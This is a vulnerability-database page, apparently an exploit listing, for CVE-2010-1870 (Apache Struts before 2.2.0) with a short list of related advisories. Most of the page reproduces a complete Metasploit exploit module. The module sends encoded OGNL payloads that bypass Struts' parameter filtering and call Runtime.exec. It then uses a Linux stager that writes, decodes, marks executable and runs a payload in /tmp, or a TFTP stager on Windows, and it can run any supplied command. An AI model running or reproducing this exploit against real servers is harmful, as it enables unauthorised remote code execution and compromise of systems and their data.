Apache Struts < 2.2.0 Remote Command Execution

🗓️ 20 Aug 2011 00:00:00Reported by RootType

Apache Struts < 2.2.0 Remote Command Execution vulnerabilit

Reporter	Title	Published	Views	Family All 47
IBM Security Bulletins	Security Bulletin: Order Management could be subject to an Apache Struts vulnerability that could allow a remote attacker to execute arbitrary code on the system.	12 Apr 202417:44	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)	14 Sep 202217:37	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)	14 Sep 202217:45	–	ibm
IBM Security Bulletins	Security Bulletin: Order Management could be subject to multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x.	12 Apr 202417:35	–	ibm
0day.today	Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability	14 Jul 201000:00	–	zdt
0day.today	Apache Struts < 2.2.0 Remote Command Execution	19 Aug 201100:00	–	zdt
0day.today	LISTSERV Maestro 9.0-8 Remote Code Execution Vulnerability	21 Oct 202000:00	–	zdt
Circl	CVE-2010-1870	19 Aug 201100:00	–	circl
Cisco	Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products	9 Jul 201416:00	–	cisco
Check Point Advisories	Apache Struts2 ParametersInterceptor Remote Command Execution (CVE-2010-1870)	11 Aug 201000:00	–	checkpoint_advisories


                                                ##
# $Id: struts_code_exec.rb 13586 2011-08-19 05:59:32Z bannedit $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::CmdStagerTFTP
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           =&gt; 'Apache Struts &lt; 2.2.0 Remote Command Execution',
            'Description'    =&gt; %q{
                    This module exploits a remote command execution vulnerability in
                Apache Struts versions &lt; 2.2.0. This issue is caused by a failure to properly
                handle unicode characters in OGNL extensive expressions passed to the web server.
                 
                    By sending a specially crafted request to the Struts application it is possible to
                bypass the &quot;#&quot; restriction on ParameterInterceptors by using OGNL context variables.
                Bypassing this restriction allows for the execution of arbitrary Java code.
            },
            'Author'         =&gt;
                [
                    'bannedit', # metasploit module
                    'Meder Kydyraliev', # original public exploit
                ],
            'License'        =&gt; MSF_LICENSE,
            'Version'        =&gt; '$Revision: 13586 $',
            'References'     =&gt;
                [
                    [ 'CVE', '2010-1870'],
                    [ 'OSVDB', '66280'],
                    [ 'URL', 'http://www.exploit-db.com/exploits/14360/' ],
                ],
            'Platform'      =&gt; [ 'win', 'linux'],
            'Privileged'     =&gt; true,
            'Targets'        =&gt;
                [
                    ['Windows Universal',
                        {
                                'Arch' =&gt; ARCH_X86,
                                'Platform' =&gt; 'win'
                        }
                    ],
                    ['Linux Universal',
                        {
                                'Arch' =&gt; ARCH_X86,
                                'Platform' =&gt; 'linux'
                        }
                    ],
                ],
            'DisclosureDate' =&gt; 'Jul 13 2010',
            'DefaultTarget' =&gt; 0))
 
            register_options(
                [
                    Opt::RPORT(8080),
                    OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', &quot;&quot;]),
                    OptString.new('CMD', [ false, 'Execute this command instead of using command stager', &quot;&quot; ])
                ], self.class)
    end
 
    def execute_command(cmd, opts = {})
        uri =  Rex::Text::uri_encode(datastore['URI'])
        var_a = rand_text_alpha_lower(4)
        var_b = rand_text_alpha_lower(2)
        var_c = rand_text_alpha_lower(4)
        var_d = rand_text_alpha_lower(4)
        var_e = rand_text_alpha_lower(4)
         
        uri &lt;&lt; &quot;?(%27\\u0023_memberAccess[\\%27allowStaticMethodAccess\\%27]%27)(#{var_a})=true&amp;&quot;
        uri &lt;&lt; &quot;(aaaa)((%27\\u0023context[\\%27xwork.MethodAccessor.denyMethodExecution\\%27]\\u003d\\u0023#{var_c}%27)(\\u0023#{var_c}\\u003dnew%20java.lang.Boolean(\&quot;false\&quot;)))&amp;&quot;
        uri &lt;&lt; &quot;(#{var_b})((%27\\u0023#{var_d}.exec(\&quot;CMD\&quot;)%27)(\\u0023#{var_d}\\[email protected]@getRuntime()))=1&quot; if target['Platform'] == 'win'
        uri &lt;&lt; &quot;(asdf)(('\\u0023rt.exec(\&quot;CMD\&quot;.split(\&quot;@\&quot;))')(\\u0023rt\\[email protected]@getRuntime()))=1&quot; if target['Platform'] == 'linux'
        uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
 
        vprint_status(&quot;Attemping to execute: #{cmd}&quot;)
 
        resp = send_request_raw({
            'uri'     =&gt; uri,
            'version' =&gt; '1.1',
            'method'  =&gt; 'GET',
        }, 5)
    end
 
    def windows_stager
        exe_fname = rand_text_alphanumeric(4+rand(4)) + &quot;.exe&quot;
 
        print_status(&quot;Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}&quot;)
        execute_cmdstager({ :temp =&gt; '.'})
        @payload_exe = payload_exe
 
        print_status(&quot;Attempting to execute the payload...&quot;)
        execute_command(@payload_exe)
    end
 
    def linux_stager
        cmds = &quot;/bin/sh@-c@echo LINE | tee FILE&quot;
        exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
        base64 = Rex::Text.encode_base64(exe)
        base64.gsub!(/\=/, &quot;\\u003d&quot;)
        file = rand_text_alphanumeric(4+rand(4))
 
        execute_command(&quot;/bin/sh@-c@touch /tmp/#{file}.b64&quot;)
        cmds.gsub!(/FILE/, &quot;/tmp/&quot; + file + &quot;.b64&quot;)
        base64.each_line do |line|
            line.chomp!
            cmd = cmds
            cmd.gsub!(/LINE/, line)
            execute_command(cmds)
        end
 
        execute_command(&quot;/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}&quot;)
        execute_command(&quot;/bin/sh@-c@chmod +x /tmp/#{file}&quot;)
        execute_command(&quot;/bin/sh@-c@rm /tmp/#{file}.b64&quot;)
 
        execute_command(&quot;/bin/sh@-c@/tmp/#{file}&quot;)
        @payload_exe = &quot;/tmp/&quot; + file
    end
 
    def on_new_session(client)
        if target['Platform'] == 'linux'
            print_status(&quot;deleting #{@payload_exe} payload file&quot;)
            execute_command(&quot;/bin/sh@-c@rm #{@payload_exe}&quot;)
        else
            print_status(&quot;Windows does not allow running executables to be deleted&quot;)
            print_status(&quot;delete the #{@payload_exe} file manually after migrating&quot;)
        end
    end
 
    def exploit
        if not datastore['CMD'].empty?
            print_status(&quot;Executing user supplied command&quot;)
            execute_command(datastore['CMD'])
            return
        end
 
        case target['Platform']
            when 'linux'
                linux_stager
            when 'win'
                windows_stager
            else
                raise RuntimeError, 'Unsupported target platform!'
        end
 
        handler
    end
end

20 Aug 2011 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.92533

Apache Struts &lt; 2.2.0 Remote Command Execution

Apache Struts < 2.2.0 Remote Command Execution